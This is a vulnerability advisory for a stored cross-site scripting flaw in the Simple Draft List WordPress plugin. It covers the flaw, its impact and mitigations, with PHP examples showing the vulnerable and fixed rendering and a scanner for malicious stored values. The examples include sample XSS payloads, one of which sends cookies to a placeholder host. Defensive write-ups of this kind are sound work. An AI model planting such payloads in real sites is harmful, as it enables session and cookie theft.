
CVE-2026-4006: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in dartiss Draft List

Severity: Medium
Tags: Vulnerability, CVE-2026-4006, CWE-79
Published: Thu Mar 19 2026 (03/19/2026, 06:46:14 UTC)
Source: CVE Database V5
Vendor/Project: dartiss
Product: Draft List

Description

CVE-2026-4006 is a stored cross-site scripting (XSS) vulnerability in the Simple Draft List WordPress plugin (all versions up to and including 2.6.2). It arises from missing sanitization and escaping of the 'display_name' post meta value when no author URL is present. Authenticated users with Contributor-level access or higher can store a script payload in the 'display_name' custom field; it executes in the browser of any user who views a page containing the vulnerable shortcode with the {{author+link}} template tag. The root cause is unescaped output insertion in the shortcode rendering logic. Exploitation requires no user interaction beyond viewing the page and can lead to session hijacking, defacement, or follow-on attacks. No exploitation in the wild is currently reported. The CVSS base score is 6.4 (medium), reflecting moderate impact and straightforward exploitation by a low-privileged authenticated user.

AI-Powered Analysis

Last updated: 03/19/2026, 07:24:30 UTC

Technical Analysis

CVE-2026-4006 identifies a stored cross-site scripting (XSS) vulnerability in the Simple Draft List plugin for WordPress, affecting all versions up to and including 2.6.2. The vulnerability stems from insufficient input sanitization and output escaping of the 'display_name' post meta field, which is a custom field rather than a native WP_Post property. When the 'user_url' meta field is empty, the plugin assigns the 'display_name' value directly to the '$author_link' variable without applying escaping functions such as esc_html(), unlike other code paths where escaping is properly applied. This unescaped value is then inserted into the shortcode output via str_replace(), specifically when rendering the '[drafts]' shortcode with the '{{author+link}}' template tag. Because the 'display_name' field can be controlled by authenticated users with Contributor-level permissions or higher, they can inject arbitrary JavaScript code that will be stored and executed in the context of any user viewing the affected page. This stored XSS can lead to session hijacking, privilege escalation, or other malicious activities. The vulnerability requires no user interaction beyond page viewing and has a CVSS 3.1 base score of 6.4, indicating medium severity. No patches or official fixes are currently linked, and no known exploits have been reported in the wild. The issue was reserved on March 11, 2026, and published on March 19, 2026, by Wordfence.
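The two rendering branches described above, as an added example rather than the plugin's own source. The function names, the template string, the meta array shape, and the use of htmlspecialchars() and filter_var() in place of WordPress's esc_html() and esc_url() are assumptions made so the script runs from the PHP CLI without a WordPress install; the {{author+link}} tag and the 'display_name' and 'user_url' meta keys are the ones the advisory names.

```php
<?php
// Added example (not the plugin's code): models the shortcode rendering path the
// advisory describes. Function names, the template and the meta array are assumptions;
// WordPress's esc_html()/esc_url() are replaced by plain-PHP stand-ins so this runs
// from the CLI without WordPress.

declare(strict_types=1);

// Stand-in for esc_html(): entity-encode everything that could open a tag or attribute.
function esc_html_stub(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Stand-in for esc_url(): only http(s) survives, so "javascript:" links become empty.
function esc_url_stub(string $url): string {
    $u = filter_var($url, FILTER_VALIDATE_URL);
    if ($u === false || !in_array(parse_url($u, PHP_URL_SCHEME), ['http', 'https'], true)) {
        return '';
    }
    return esc_html_stub($u);
}

// Vulnerable rendering, mirroring the flaw as described: when user_url is empty the
// raw display_name lands in $author_link and is str_replace()'d into the template.
function render_vulnerable(string $template, array $meta): string {
    $display_name = $meta['display_name'] ?? '';
    $user_url     = $meta['user_url'] ?? '';
    if ($user_url !== '') {
        $author_link = '<a href="' . esc_url_stub($user_url) . '">' . esc_html_stub($display_name) . '</a>';
    } else {
        $author_link = $display_name;   // BUG: this branch never escapes
    }
    return str_replace('{{author+link}}', $author_link, $template);
}

// Hardened rendering: the name is escaped once, before either branch builds the link.
function render_fixed(string $template, array $meta): string {
    $display_name = esc_html_stub($meta['display_name'] ?? '');
    $user_url     = $meta['user_url'] ?? '';
    $author_link  = $user_url !== ''
        ? '<a href="' . esc_url_stub($user_url) . '">' . $display_name . '</a>'
        : $display_name;
    return str_replace('{{author+link}}', $author_link, $template);
}

// Constructed sample input: what a Contributor could store in the custom field.
$template = '<li>Draft by {{author+link}}</li>';
$payload  = '<img src=x onerror=alert(document.cookie)>';
$meta     = ['display_name' => $payload, 'user_url' => ''];

echo "vulnerable: ", render_vulnerable($template, $meta), PHP_EOL;
echo "fixed:      ", render_fixed($template, $meta), PHP_EOL;
```

Run with `php render.php`: the vulnerable branch emits the `<img ... onerror=...>` tag intact inside the list item, while the fixed branch emits it as entities. In the real plugin the equivalent change is to pass the name through esc_html() on the no-URL branch, matching what the URL branch already does.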

Potential Impact

The primary impact of CVE-2026-4006 is stored cross-site scripting on WordPress sites running the vulnerable Simple Draft List plugin. An attacker with Contributor-level access or higher can store a script that executes in the browser of every user who views an affected page. Consequences include session hijacking, theft of authentication cookies (where they are not HttpOnly), defacement, actions performed in the victim's session, and pivoting to further attacks on the site or its users. Because WordPress itself is so widely deployed, any site that has this plugin installed and lets untrusted people hold Contributor accounts (guest authors, community blogs, multi-author news sites) is exposed. Every visitor to a page that renders the vulnerable shortcode is in scope, so administrators who preview or review drafts are at risk alongside ordinary readers. Exploitation requires an authenticated account, but Contributor is the lowest content-creating role and is commonly granted, which makes the threat realistic. The vulnerability does not affect availability; it impacts the confidentiality and integrity of user sessions and site content. The absence of known exploitation in the wild lowers immediate risk but does not remove it, since proof-of-concept code for a one-line escaping bug is trivial to produce.

Mitigation Recommendations

To mitigate CVE-2026-4006, site administrators should first check for an updated plugin release from the vendor and apply it promptly once available. Until an official fix is in place, the following targeted mitigations apply:

1) Restrict Contributor-level (and higher) accounts to trusted users, since the payload must be stored by an authenticated user.
2) Treat the 'display_name' custom field as untrusted: sanitize it on save (for example with wp_kses() or by stripping tags) and, independently, escape it on output with esc_html(). Escaping on output is the control that actually closes the bug; sanitizing on save only reduces what an attacker can store.
3) Patch the plugin locally so that the '$author_link' variable is escaped on the no-URL branch, mirroring the escaped code path used when an author URL is present.
4) Deploy a Web Application Firewall with rules that block common XSS payloads in the request that stores the custom field. Note that a WAF inspects the injection request, not the later page render, so it is a backstop rather than a fix.
5) Review existing 'display_name' meta values for stored markup, event handlers or script URLs, and monitor logs for repeated attempts to write such content.
6) Educate content contributors about the risks of inserting HTML or scripts into custom fields.
7) Disable or replace the Simple Draft List plugin if none of the above can be applied promptly.
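A small triage helper for the review step above, added here as an example and not part of the plugin or of WordPress. It assumes the field lives in wp_postmeta under meta_key 'display_name' as the advisory describes, and it works on rows constructed inline so it runs offline; in practice you would feed it the result of `SELECT meta_id, post_id, meta_key, meta_value FROM wp_postmeta WHERE meta_key = 'display_name'`. The function names and the suspicion heuristics are assumptions.

```php
<?php
// Added example (not the plugin's or WordPress's code): flags stored 'display_name'
// meta values that contain markup, inline event handlers or script URLs. Rows are
// constructed inline in the shape of wp_postmeta so the script runs without a database.

declare(strict_types=1);

// Decode entities and percent-encoding once so "&lt;script&gt;" or "%3Cscript" is not
// missed. This side only decides what deserves a human look; output escaping decides
// what is safe to render.
function decode_for_inspection(string $v): string {
    return html_entity_decode(rawurldecode($v), ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function is_suspicious_display_name(string $value): bool {
    $v = decode_for_inspection($value);
    if ($v !== strip_tags($v)) {            // any HTML tag at all
        return true;
    }
    // Attribute and URL patterns that matter even when no tag survived decoding.
    return (bool) preg_match('~(?:\bon[a-z]+\s*=|javascript\s*:|data\s*:text/html)~i', $v);
}

// Returns the subset of rows whose display_name value needs review.
function scan_display_names(array $rows): array {
    $flagged = [];
    foreach ($rows as $row) {
        if (($row['meta_key'] ?? '') !== 'display_name') {
            continue;
        }
        if (is_suspicious_display_name((string) $row['meta_value'])) {
            $flagged[] = $row;
        }
    }
    return $flagged;
}

// Constructed sample rows (not real data).
$rows = [
    ['meta_id' => 1, 'post_id' => 10, 'meta_key' => 'display_name', 'meta_value' => 'Jane Author'],
    ['meta_id' => 2, 'post_id' => 11, 'meta_key' => 'display_name', 'meta_value' => '<script>fetch("https://example.invalid/?c="+document.cookie)</script>'],
    ['meta_id' => 3, 'post_id' => 12, 'meta_key' => 'display_name', 'meta_value' => '&lt;img src=x onerror=alert(1)&gt;'],
    ['meta_id' => 4, 'post_id' => 13, 'meta_key' => 'user_url',     'meta_value' => 'javascript:alert(1)'],
    ['meta_id' => 5, 'post_id' => 14, 'meta_key' => 'display_name', 'meta_value' => "O'Brien & Sons"],
];

foreach (scan_display_names($rows) as $hit) {
    printf("post %d meta_id %d needs review: %s\n", $hit['post_id'], $hit['meta_id'], $hit['meta_value']);
}
```

Plain names with apostrophes or ampersands are left alone; values that only look harmless because they were stored entity-encoded are still caught, since the plugin's vulnerable branch would emit them after any decoding WordPress applies on the way out. Flagged rows should be reviewed by a person and the originating account checked before the value is deleted.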


Technical Details

Data Version: 5.2
Assigner Short Name: Wordfence
Date Reserved: 2026-03-11T18:57:28.782Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 69bba122e32a4fbe5f9bab77

Added to database: 3/19/2026, 7:09:22 AM

Last enriched: 3/19/2026, 7:24:30 AM

Last updated: 3/19/2026, 8:11:25 AM

